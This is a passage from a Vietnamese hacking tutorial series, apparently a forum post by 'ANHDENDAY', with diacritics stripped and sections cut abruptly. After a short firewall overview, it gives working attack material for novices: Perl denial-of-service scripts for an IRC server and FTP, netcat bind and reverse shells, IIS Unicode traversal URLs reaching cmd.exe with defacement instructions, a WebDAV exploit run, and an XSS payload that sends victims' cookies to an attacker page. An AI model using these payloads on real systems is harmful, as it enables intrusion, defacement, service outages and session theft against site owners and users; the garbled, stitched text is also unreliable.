Internet) hay t ngoi truy cp vo trong (Internet vo Intranet).
Theo di lung d liu gia Internet v Intranet.
Kim sot a ch truy cp , cm a ch no truy cp.
Kim sot ngi s dng v vic truy cp ca ngi s dng.
Kim sot ni dung thng tin lu chuyn trn mng.
Tuy nhin firewall vn c mt s mt hn ch :
Firewall khng thng minh nh con ngi c th c hiu tng lai thng tin
v phn tch ni dung tt hay xu ca n.Firewall ch c th ngn chn s xm nhp
ca nhng ngun thng tin khng mong mun nhng phi xc nh r cc a ch
truy cp.
Khng th ngn cn nhng cuc tn cng khng i qua n , nhng cuc tn cng
bng d liu (data-drivent attack).
Khng th r qut virus my tnh trn nhng d liu c chuyn qua n v s gia
tng nhanh chng ca cc loi virus mi v c nhiu cch m ho d liu thot
khi s kim sot ca firewall
Mt s phn mm firewall :
1-SMTP Gateway-Proxy Server cho cng SMTP :
Chng trnh SMTP Gateway c xy dng trn c s s dng 2 phn mm Smap
v Smapd ,dng chng li s truy cp thng qua giao thc SMTP.Nguyn l thc
hin l chn trc chng trnh Mail Server nguyn thy ca h thng , khng cho
php cc h thng bn ngoi kt ni ti Mail Server v trong mng tin cy ca mail
server thng c mt s quyn u tin kh cao.Trn HH Unix , chng trnh Mail
Server c thc hin bi Sendmail (Send mail dng lm g th coi trn).
Khi mt h thng xa kt ni ti cng SMTP , chng trnh smap s dnh quyn
phc v v chuyn t th mc dnh ring v t USER-ID mc bnh thng (khng
c quyn u tin).Mc ch duy nht ca smap l i thoi SMTP vi cc h thng
khc , thu lm mail , ghi vo a , ghi nht k v kt thc.Cn i vi Smapd , n s
qut th mc ny thng xuyn , khi pht hin c mail s chuyn d liu cho
Sendmail phn pht vo hm th c nhn hoc chuyn tip ti cc mail server
khc .
Nh vy , mt user l trn mng s khng kt ni c ti Mail Server v t c cc
thng tin theo ng ny u c th kim sot c .Tuy nhin nhc im ca
chng trnh ny l khng th gii quyt nhng vn nh l th nc danh hoc cc
phng php tn cng bng ng khc.
2-FTP Gateway -Proxy Server dnh cho dch v FTP:
Proxy Server dnh cho dch v FTP cung cp kh nng kim sot kh nng truy cp
vo dch v FTP da trn a ch IP v Hostname , v cung cp quyn iu khin truy
co th cp cho php tu chn kho hoc ghi nht k bt k lnh FTP no .Cc a ch
ch ny cng c th tu chn c (cho php hoc b cm ).Tt c cc s kt ni v
dung lng d liu chuyn qua u b nht k ghi li.
FTP Gateway t bn thn n khng e da an tonh ca h thng bi v n chy root
ti mt h mc rng v khng thc hin bt k th tc input/output file no ngoi
vic c file cu hnh ca n .FTP Server ch cung cp dch v FTP m khng quan
tm n vic ai c quyn hay khng c quyn dowload cc file .Do vy vic xc nh
quyn phi c thit lp trn FTP Gateway v phi thc hin tr khi thc hin vic
upload/download file.
FTP Gateway c th ngn nga mi s xm nhp vo mng qua cng FTP mt cch
kh linh hot (cho php ngn cn tng a ch hay ton b mng) v cng kim sot
vic truy cp ti tng kh nng nh dowload /upload thng tin.
3-Telnet Gateway-Proxy Server cho Telnet :
Telnet Gateway l mt proxy server qun l truy cp mng da trn a ch IP ,
hostname v cung cp s iu khin truy cp th cp cho php tu chn kho bt k
ch no. Tt c cc s kt ni d liu chuyn qua u c nht k ghi li.Mi ln
user kt ni ti Telnet Gateway , user phi chn phng thc kt ni.Telnet Fateway
khng lm hi ti h thng v n ch hot ng trong mt phm vi nht nh (c
cho php).VD : H thng s chuyn quyn iu khin ti mt th mc dnh ring,
ng thi cm truy cp ti nhng th mc v file khc.
Telnet Gateway c s dng kim sot cc truy cp vo mng ni b.Cc truy
cp khng c php s khng th thc hin c mt tc v no , cn nhng truy
cp hp php s b nht k ghi li (thi gian truy cp , nhng tc v )
4-HTTP Gateway Proxy Server dnh cho Web :
Cm n s ng h ca cc bn v y l phn 7
42 . ) K thut n cng DoS vo WircSrv Irc Server v5.07 :
_ WircSrv IRC l mt Server IRC thng dng trn Internet ,n s b Crash nu nh b
cc Hacker gi mt Packet ln hn gi tr ( 65000 k t ) cho php n Port 6667.
Bn c th thc hin vic ny bng cch Telnet n WircSrv trn Port 6667:
Nu bn dng Unix:
[hellme@die-communitech.net$ telnet irc.example.com 6667
Trying example.com...
Connected to example.com.
Escape character is '^]'.
[buffer]
Windows cng tng t:
telnet irc.example.com 6667
Lu : [buffer] l Packet d liu tng ng vi 65000 k t .
Tuy nhin , chng ta s crash n rt n gin bng on m sau ( Cc bn hy nhn
vo on m v t mnh gii m nhng cu lnh trong , cng l mt trong
nhng cch tp luyn cho s phn x ca cc hacker khi h nghin cu . No , chng
ta hy phn tch n mt cch cn bn ):
CODE
#!/usr/bin/perl #< == on m ny cho ta bit l dng cho cc lnh trong perl
use Getopt::Std;
use Socket;
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);
$foo = "A"; # y l NOP
$number = "65000"; # y l tt c s NOP
$data .= $foo x $number; # kt qu ca $foo times $number
$serv = $args{s}; # lnh iu khin server t xa
$port = 6667; # lnh iu khin cng t xa , n c mc nh l 6667
$buf = "$data";
$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";
print S "$buf";
print("Data has been successfully sent to $serv\n");
sub usage {die("\n\n Li WircSrv Version 5.07s
c th tn cng bng DoS \n gi 2 64k gi tin n server lm cho n crash.\n -s
server_ip\n\n");}
s dng ci m ny , bn hy save n vo mt file *.pl , rI down chng trnh
activeperl v si , setup n ri vo HH DOS bn ch cn gi file ny ra theo lnh sau
:
C:\>perl < ng dn n file *.pl >
( n by gi ti s khng by tht cn k na m s tng dn kh ln , nu bn
no nghin cu k cc bi trc th cc bn s lm c d dng thi )
43 . ) K thut tn cng DoS vo my tnh s dng HH Win2000 :
_ Mun s dng c n , bn phi c activeperl , ri s dng nh hng dn tng
t trn . Save on m vo file *.pl rI dng lnh perl gi n ra :
CODE
#!/usr/bin/perl -w
use Socket;
use Net::RawIP;
use Getopt::Std;
getopts("s:d:p:l:n:v:t:f:T:rL",%o);$ver="0.3a";$0=~s#.*/##;
print"--- $0 v.$ver b/ Nelson Brito / Independent Security Consultant --- ";
$l=$o{'l'}?$o{'l'}+28:800+28;$n=$o{'n'}?$o{'n'}/2:800/2;
$v=$o{'v'}||4;$t=$o{'t'}||1;$f=$o{'f'}||0;$T=$o{'T'}||64;
$p=$o{'p'}?$o{'p'}:(getservbyname('isakmp','udp')||die"getservbyname: $! ");
($o{'s'}&&$o{'d'})||die
" Use: $0 [IP Options] [UDP Options] ",
"IP Options: ",
use IO::Socket;
sub initiate {
if ($ARGV[0] eq '') {die "Usage: perl abc.pl <host> <port> <username>
<password>\nVi du : perl abc.pl 127.0.0.1 21 anonymous me@\n";}
$host = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
};
sub connecttoserver {
print("Connect den host: $host\n");
$socket = IO::Socket::INET->new (PeerAddr => $host,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM
) || die "khong the connect den $host";
print "Connect thanh cong . Loggin vao...\n";
};
sub login {
print "user $user\n";
print $socket "user $user\r\n";
$response = <$socket>;
print "$response\n";
print "pass $pass\n";
print $socket "pass $pass\r\n";
$response = <$socket>;
print "$response\n";
print "Logged in. Dang tan cong DoS doi phuong. Nhan CTRL-C de ngung.\n";
};
sub doit {
for (;; ){
print "retr a:/x\n";
print $socket "retr a:/x\r\n";
$response = <$socket>;
print "$response";
}
}
initiate();
connecttoserver();
login();
doit();
http://www.xxx.com/cgi-bin/calen..._admin.pl?admin
_ Vy l bn c c quyn admin ri .
b . ) WebBBS Script :
_WebAdverts Script l mt scripts cho php webmasters hin th nhng biu ng
lun phin ( qung co chng hn ) hay thm vo trong trang Web , cui cng bn
c th s dng kt hp password v username ci t banners to mt banner
accounts mi , xo accounts view sensitive info, vv.vv
_a ch passwd ca WebAdverts l :
http://www.xxx.com/cgi-bin/advert/adpassword.txt
sau khi gii m bn logging vo:
http://www.xxx.com/cgi-bin/advert/ads_admin.pl
login nh l script administrator .
c . ) WWWBoard Script :
_WWWBoard c file password c th tm thy trong pasword.txt , chng ta hy
search n bng t kho cgi-bin/wwwebboard hoc webboard/password.txt .
d . ) Mailmachine Script :
_Mailmachine.cgi l mt webbased mailinglist , bn c th trng thy file
adressed.txt cha tt c danh sch khch ng k , nhng danh sch c th thy
ti nhng urls sau:
http://www.xxx.com/cgi-bin/mailman/addresses.txt
http://www.xxx.com/cgi-bin/maillist/addresses.txt
http://www.xxx.com/cgi-bin/mail/addresses.txt
bn cng nn tm addresses.txt m i khi chng c i thnh cc tn khc .
Chng c th cha cc thng tin quan trng cho php bn khai thc .
Vic tm ra cc trang b li ny hn cc bn bit , ti s khng nhc li na ( Nu
ai cha bit th vui lng c lI nhng phn trc ) .
====================================================
==
Nhn y ti xin nh chnh li l trong cc on code m ti phn tch v post ln
nhng phn trc ti s khng thm k hiu # vo trc nhng cu phn tch
, dn n vic mt s bn thc mc l on code khng hot ng . Ti thnh
tht xin li cc bn v s ca ti , cc bn ch cn ly on code ra v thm vo
du # pha trc dng ch thch Ting Vit ca ti l c ( Thng thng ti
c s dng du < == gii thch phi ui on code . Cc bn hy
m fix nh .
Chc vui v .
GOOKLUCK!!!!!!!!!!!!
Ht phn 7 .
Bi vit ca ANHDENDAY
y l phn 8 .
47 . ) Cc cng c cn thit hack Web :
_ i vi cc hacker chuyn nghip th h s khng cn s dng nhng cng c ny
m h s trc tip setup phin bn m trang Web nn nhn s dng trn my ca
mnh test li . Nhng i vi cc bn mi vo ngh th nhng cng c ny rt
cn thit , hy s dng chng mt vi ln bn s bit cch phi hp chng vic
tm ra li trn cc trang Web nn nhn c nhanh chng nht . Sau y l mt s
cng c bn cn phi c trn my lm n ca mnh :
_ Cng c th 1 : Mt ci proxy dng che du IP v vt tng la khi cn ( Cch
to 1 ci Proxy ti by phn 7 , cc bn hy xem li nh ) .
_ Cng c th 2 : Bn cn c 1 shell account, ci ny thc s quan trng i vi
bn . Mt shell account tt l 1 shell account cho php bn chy cc chng trnh
chnh nh nslookup, host, dig, ping, traceroute, telnet, ssh, ftp,...v shell account
cn phi ci chng trnh GCC ( rt quan trng trong vic dch (compile) cc exploit
c vit bng C) nh MinGW, Cygwin v cc dev tools khc.
Shell account gn ging vi DOS shell,nhng n c nhiu cu lnh v chc nng hn
DOS . Thng thng khi bn ci Unix th bn s c 1 shell account, nu bn khng
ci Unix th bn nn ng k trn mng 1 shell account free hoc nu c ai ci
Unix v thit lp cho bn 1 shell account th bn c th log vo telnet (Start --> Run
--> g Telnet) dng shell account . Sau y l 1 s a ch bn c th ng k
free shell account :
http://www.freedomshell.com/
http://www.cyberspace.org/shell.html
http://www.ultrashell.net/
_Cng c th 3 : NMAP l Cng c qut cc nhanh v mnh. C th qut trn mng
din rng v c bit tt i vi mng n l. NMAP gip bn xem nhng dch v no
ang chy trn server (services / ports : webserver , ftpserver , pop3,...),server
ang dng h iu hnh g,loi tng la m server s dng,...v rt nhiu tnh
nng khc.Ni chung NMAP h tr hu ht cc k thut qut nh : ICMP (ping
aweep),IP protocol , Null scan , TCP SYN (half open),... NMAP c nh gi l cng
c hng u ca cc Hacker cng nh cc nh qun tr mng trn th gii.
Mi thng tin v NMAP bn tham kho ti http://www.insecure.org/ .
_ Cng c th 4 : Stealth HTTP Security Scanner l cng c qut li bo mt tuyt
vi trn Win32. N c th qut c hn 13000 li bo mt v nhn din c 5000
exploits khc.
_ Cng c th 5 : IntelliTamper l cng c hin th cu trc ca mt Website gm
nhng th mc v file no, n c th lit k c c th mc v file c set password.
Rt tin cho vic Hack Website v trc khi bn Hack mt Website th bn phi nm
mt s thng tin ca Admin v Website .
_ Cng c th 6 : Netcat l cng c c v ghi d liu qua mng thng qua giao thc
TCP hoc UDP. Bn c th dng Netcat 1 cch trc tip hoc s dng chng trnh
script khc iu khin Netcat. Netcat c coi nh 1 exploitation tool do n c th
to c lin kt gia bn v server cho vic c v ghi d liu ( tt nhin l khi
Connection: close
Content-Type: text/html
sent 17, rcvd 245: NOTSOCK
Nu mun ghi nht k, hy dng -o <tn_file>. V d:
nc -vv -o nhat_ki.log 172.16.84.2 80
xem file nhat_ki.log xem th n ghi nhng g nh :
CODE
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a # l....
du < ngha l server gi n netcat
du > ngha l netcat gi n server
_ Qut cng :
Bn hy chy netcat vi ty chn z . Nhng qut cng nhanh hn, bn hy dng
-n v netcat s khng cn thm vn DNS. V d scan cc cng TCP(1->500) ca
host 172.16.106.1
CODE
[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open
nu bn cn scan cc cng UDP, dng -u
CODE
[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN)
(UNKNOWN)
(UNKNOWN)
(UNKNOWN)
[172.16.106.1]
[172.16.106.1]
[172.16.106.1]
[172.16.106.1]
138
137
123
111
(?)
(?)
(?)
(?)
open
open
open
open
Ring i vi Netcat cho Win, bn c th lng nghe ngay trn cng ang lng nghe.
Ch cn ch nh a ch ngun l -s<a_ch_ip_ca_my_ny>. V d:
CODE
netstat -a
...
TCP nan_nhan:domain nan_nhan:0 LISTENING <- cng 53 ang lng nghe
...
E:\>nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lng nghe ngay trn cng 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163?
?
Trn Windows NT, t Netcat ch lng nghe, khng cn phi c quyn
Administrator, ch cn login vo vi 1 username bnh thng khi ng Netcat l
xong.
Ch : bn khng th chy netcat vi ... -u -e cmd.exe... hoc ...-u -e /bin/sh... v
netcat s khng lm vic ng. Nu bn mun c mt UDP shell trn Unix, hy dng
udpshell thay cho netcat.
( Da theo bi vit ca huynh Vicky )
49 . ) K thut hack IIS server 5.0 :
_ IIS server vi cc phin bn t trc n phin bn 5.0 u c li ta c th khai
thc , do by gi hu ht mi ngi u dng IIS server 5.0 nn li cc phin bn
trc ti khng cp n . By gi ti s by cc bn cch hack thng qua cng c
activeperl v IE , cc bn c th vn dng cho cc trang Web VN v chng b li ny
rt nhiu . Ta hy bt u nh .
_ Trc ht cc bn hy download activeperl v Unicode.pl .
_ S dng telnet xc nh trang Web ta tn cng c s dng IIS server 5.0 hay
khng :
CODE
telnet < tn trang Web > 80
GET HEAD / HTTP/1.0
Nu n khng bo cho ta bit mc tiu ang s dng chng trnh g th cc bn hy
thay i cng 80 bng cc cng khc nh 8080, 81, 8000, 8001 .v.v
_ Sau khi xc nh c mc tiu cc bn vo DOS g :
CODE
perl unicode.pl
Host: ( g a ch server m cc bn mun hack )
Port: 80 ( hoc 8080, 81, 8000, 8001 tu theo cng m ta telnet trc ) .
_ Cc bn s thy bng lit k li ( c lp trnh trong Unicode.pl ) nh sau :
CODE
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13]/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14]/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\
%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15]/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[17]/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
Cc bn s thy c tt c cc li trn nu trang Web nn nhn b tt c nhng li
nh vy , nu server ca nn nhn ch b li th 13 v 17 th bng kt qu ch xut
hin dng th 13 v 17 m thi .
Ti ly VD l bng kt qu cho ti bit trang Web nn nhn b li th 3 v 7 , ti s
ra IE v nhp on m tng ng trn Address :
http://www.xxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+ < == li
dng th 3
hoc
http://www.xxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ < == li
dng th 7
n y cc bn c th xm nhp vo server ca nn nhn ri , cc bn hy
s dng lnh trong DOS m khai thc thng tin trong ny . Thng thng cc trang
Web nm th mc vinetpub\wwwroot , cc bn vo c rI th ch cn thay
index.html vI tn hack by . L c ri , ng quy h nh .
GOOKLUCK!!!!!!!!!!!!!!!
( Ht phn 8 )
Bi vit ca ANHDENDAY
y l phn 9
50 . ) K thut hack server thng qua li trn b m WebDAV :
_ Gii thiu : Giao thc World Wide Web Distributed Authoring and Versioning
(WebDAV) l mt tp hp cc m rng cho giao thc HTTP dng cung cp mt
cch thc chun cho vic bin tp v qun l file gia cc my tnh trn Internet. Li
trn b m c pht hin trong mt thnh phn ca Windows 2000 c s
dng bi WebDAV c th cho php k tn cng chim quyn iu khin my tnh .
_ Chun b : Ngoi nhng ngh gii thiu cc bi trc , cc bn hy vo
down thm www32.brinkster.com/anhdenday/wb.zip extract trong C:\
_ Khai thc :
+ Tm mt trang Web dng IIS 5.0
+ Vo Dos , vo t NETCAT ch lng nghe :
CODE
C:\>nx -vv -l -p 53
listening on [any] 53 ...
Ta n lng nghe cng 53 v tng la ko chn cng ny .
+ M thm mt ca s DOS na .
+ Ta s dng WebDAV va down v .
c:\wb.exe <IP ca my ch IIS> <IP ca my tnh ca mnh dng tn cng>
<cng lng nghe> [padding=1,2,3...]
VD :
CODE
C:\> webdav xxx.xxx.xxx.xxx 203.162.xxx.xxx 53 1
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer
Checking WebDav on 'xxx.xxx.xxx.xxx' ... FOUND
exploiting ntdll.dll through WebDav [ret: 0x00100010]
Connecting... CONNECTED
Sending evil request... SENT
Now if you are lucky you will get a shell.
+ Nu nh may mn bn c th ly c shell ca my ch IIS . Nu nh my tnh
dng tn cng hin ra kt qu nh sau th bn c shell ri :
CODE
C:\>nc -vv -l -p 53
listening on [any] 53 ...
connect to [203.162.xxx.xxx] from xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx] 1125
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
Bc 3 : Xc nh kh nng site c b li XSS hay khng bng cch xem thng tin tr
v :
V d bn thy nh th ny :
"Your search for 'abc' did not find any items"
"Your search for 'abc' returned the following results"
"User 'abc' is not valid"
"Invalid login 'abc'"
hoc l ci g m c dnh ti ch "abc" m bn nhp vo ban u th 99% thng
ny bi XSS
Bc 4 : Chn code thc s vo ni b li :
chn ci ny :
<script>alert('abc')</script>
vo ban ny v nhn SUBMIT . Nu sau bn nhn c 1 popup c ch "abc" th
thng ny 100% b dnh XSS . Nhng xin ch , thnh thong vn c trng hp
website b dnh XSS nhng vn khng xut hin ci popup th buc lng bn phi
VIEW SOURCES n ra xem . Khi view sources nh kim dng
ny<script>alert('abc')</script> , nu c th XSS y ri .
Mt v d khc thng gp hn :
Gi http://sitebiloi.com l site b dnh li XSS v ta tm c ni b li nh th ny :
..." target=_blankhttp://sitebiloi.com/?page=<script>...<script> , ngha l ta c th
chn code ngay trn thanh ADDRESS .
Ti khng th trnh by ht mi tnh hung c , ci m cc bn cn l hiu ra vn
th bn s hiu c khi no b li .
_ Khai thc :
+ Ly li v d site b XSS trn thanh address , ly cookie ca nn nhn ta lm
nh th ny :
http://sitebiloi.com/index.asp?page=<script>window.open("http:// a ch trang
Web ta va up file cookie. asp ln /cookie.asp?cookie="+document.cookie)</script>
th ngay lp tc on code c chn vo trong web page , v trng nh vy :
CODE
----------------------------------------------------------<HTML>
<TITLE> Hello all! </TITLE>
hello
<script>window.open("a ch trang Web ta va up file cookie.asp ln /cookie.asp?
cookie="+document.cookie)</script>
...
</HTML>
-------------------------------------------------------------Vi on code ny th trnh duyt s thi hnh on code v sau s gi ton b
cookie ti cho bn dng file .txt v bn ch vic m file ny ra xem .
+ Vy gp trng hp nh qun tr hn ch s xm nhp bng cch lc b cc k t
c bit ta phi lm sao ? Cc bn th cch thay th cc k t bng cc m i
din . VD :
* Nu "B lc" loi b 2 k t "<" v ">" :
Hacker s dng "\x3c" v "\x3e" thay th v bt u chn code vi
www.victim.com/advwebadmin/autosignup/newwebadmin.asp
( Lnh ny to mt free hosting )
Nu nh 2 lnh trn cng thc hin c th ta c th khai thc chng c ri ,
he he .
_ Cch khai thc :
+ V to c hosting nn ta c th upload c file v t , cc bn hy ch th
xem a ch m ct cc file ta va upload ln u ( bng cch nhn vo thanh
statup ) .
+ Tip theo l ta lm sao chuyn ci file vo th mc cha trang ch ca nn
nhn , theo mc nh n s nm y :
C:\Program Files\Advanced Communications\NT Web Hosting Controller\web\
( Cc bn c th thay C:\ bng D:\ , E:\ )
+ Khi xc nh c chnh xc a ch ri ta s tm on script lm gip :
http://[targethost]/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\
( ng dn n th mc web victim )&owwwPa th=C:\&oftpPath=C:\( ng dn
n th mc ta va upload file )
+ Cc bn c th test ng dn file up ln c chnh xc khng bng cch up ln file
a.html bt k , gi s n c up ln nm C:\Program Files\Advanced
Communications\NT Web Hosting Controller\web\admin\a.html ta s test bng cch
nh ng dn URL :
www.victim/admin[avdadmin]/a.html
+ Nu nh ng l chnh xc ri th ch cn up ngh ln l xong , .
---------------------------------------------------------------------------------------------GOODLUCK!!!!!!!!!!!!!!!!!
( Ht phn 9 )
Bi vit ca ANHDENDAY
type lnh th phi type cho ng, tp cn thn cho quen i nh/
netstat -option ( vi options l g th type netstat -help)
netstat -help
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.